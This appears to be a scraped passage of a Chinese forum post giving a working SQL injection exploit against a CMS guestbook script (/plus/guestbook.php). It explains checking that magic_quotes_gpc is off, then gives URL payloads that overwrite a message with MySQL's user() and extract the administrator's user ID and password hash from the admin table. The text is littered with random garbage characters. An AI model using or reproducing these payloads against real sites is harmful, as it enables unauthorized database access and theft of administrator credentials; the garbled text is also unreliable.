9 R. |% f# }; p @ m# k4 c: V( Z明漏洞无法利用应为他开启了 php magic_quotes_gpc=off( T, m8 d7 Q, r
如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。 0 w0 _0 L, L5 g) N* _那么再次访问 - f# v& G, a1 i/ Z- a* W; B8 B# X- N www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回,那条留言ID的内容就直接修改成了mysql 的user().2 x6 M2 _/ y* ^$ V) u \( k$ ?
4 ]" B, g5 \4 a/ }, j, a
大概利用就是这样,大家有兴趣的多研究下!!% _6 e# d! \5 G8 |: C
6 |1 e5 M! P, }% `最后补充下,估计有人会说怎么暴管理后台帐户密码,你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)!!/ E- j/ u) U s0 Y5 l d
9 Y. N- p" n: x
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='